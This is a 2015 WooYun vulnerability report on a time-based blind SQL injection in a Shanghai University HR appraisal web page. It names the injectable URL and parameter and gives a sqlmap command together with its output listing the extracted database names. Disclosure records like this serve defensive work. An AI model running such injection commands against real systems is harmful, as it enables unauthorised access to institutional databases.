漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0112789
漏洞标题:上海大学人事考核2012MSSQL注入一枚
相关厂商:上海大学
漏洞作者: 夸父追日
提交时间:2015-05-22 11:45
修复时间:2015-07-11 11:44
公开时间:2015-07-11 11:44
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:5
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-22: 细节已通知厂商并且等待厂商处理中
2015-05-27: 厂商已经确认,细节仅向厂商公开
2015-06-06: 细节向核心白帽子及相关领域专家公开
2015-06-16: 细节向普通白帽子公开
2015-06-26: 细节向实习白帽子公开
2015-07-11: 细节向公众公开
简要描述:
俺只求一个邀请码
详细说明:
基于时间的盲注,,太卡了,,我就爆了一下,,,太浪费时间了,,已验证该注入确实是存在的
漏洞证明:
注入点:http://hreva.shu.edu.cn:8088/JobsList.aspx?dept=-1&spec=-1&sta=30000001&job=-1&pert=-1
sqlmap.py -u "http://hreva.shu.edu.cn:8088/JobsList.aspx?dept=
-1&spec=-1&sta=30000001&job=-1&pert=-1" -p "spec" --dbs
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2012
[17:03:09] [INFO] fetching database names
[17:03:09] [WARNING] the SQL query provided does not return any output
[17:03:09] [WARNING] in case of continuous data retrieval problems you are advi
ed to try a switch '--no-cast' or switch '--hex'
[17:03:09] [INFO] fetching number of databases
[17:03:09] [INFO] resumed: 64
[17:03:09] [INFO] resumed: AlumniDB
[17:03:09] [INFO] resumed: BaseCent\\?81r
[17:03:09] [INFO] resumed: BPM
[17:03:09] [INFO] resumed: bps
[17:03:09] [INFO] resumed: BSCS
[17:03:09] [INFO] resumed: bscs-new
[17:03:09] [INFO] resumed: emrsyytem
[17:03:09] [INFO] resumed: feidphs
[17:03:09] [INFO] resumed: gonghui
[17:03:09] [INFO] resumed: health
[17:03:09] [INFO] resumed: HISBS
[17:03:09] [INFO] resumed: hischemical
[17:03:09] [INFO] resumed: hisciemicalYC
[17:03:09] [INFO] resumed: HisFenxiyi
[17:03:09] [INFO] resumed: HISJD
[17:03:09] [WARNING] cannot properly display Unicode characters inside Windows
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances w
ll result in replacement with '?' character. Please, find proper character repr
sentation inside corresponding output files.
[17:03:09] [INFO] resumed: ?ISYC\x05!a
[17:03:09] [INFO] resumed: InfoPlus\x19
[17:03:09] [INFO] resumed: InfoPlus_Dev!
[17:03:09] [INFO] resumed: InfoPlusMembership
[17:03:09] [INFO] resumed: InfoPl\\?81sMembershrp_Dev\x05
[17:03:09] [INFO] resumed: InfoPlusStrteAi
[17:03:09] [INFO] resumed: InfoPlusStatg_Dev\n\x03\x02
[17:03:09] [INFO] resumed: InkoTest(a
[17:03:09] [INFO] resumed: JiraaB
[17:03:09] [INFO] resumed: jkg\\?81ptA\x12
[17:03:09] [INFO] resumed: }wcqutaa$
[17:03:09] [INFO] resumed: Li?p\\?81p
[17:03:09] [INFO] resumed: m?\\?81?\\?a3?i\\?81d\\?9fa????\\?81\x04dq?\x12\x11\
03\x03
[17:03:09] [INFO] resumed: ?a樂?p?\\?81a\\?f9餆谈cd敆_\x7fe弄\\?82\x11!\x06!\t\
[17:03:09] [INFO] resumed: mxs?\\?f9r}\x11K'3
[17:03:09] [INFO] resumed: 'a???i??!!
[17:03:09] [INFO] resumed: \\?beaw攂?嵊a?\\?84\x03
[17:03:09] [INFO] resumed: M瀆焁z輁m?u缄#
[17:03:09] [INFO] resumed: M?B\\?a4
[17:03:09] [WARNING] time-based comparison requires larger statistical model, p
ease wait.............................
修复方案:
额
版权声明:转载请注明来源 夸父追日@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-05-27 11:43
厂商回复:
CNVD确认所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。
最新状态:
暂无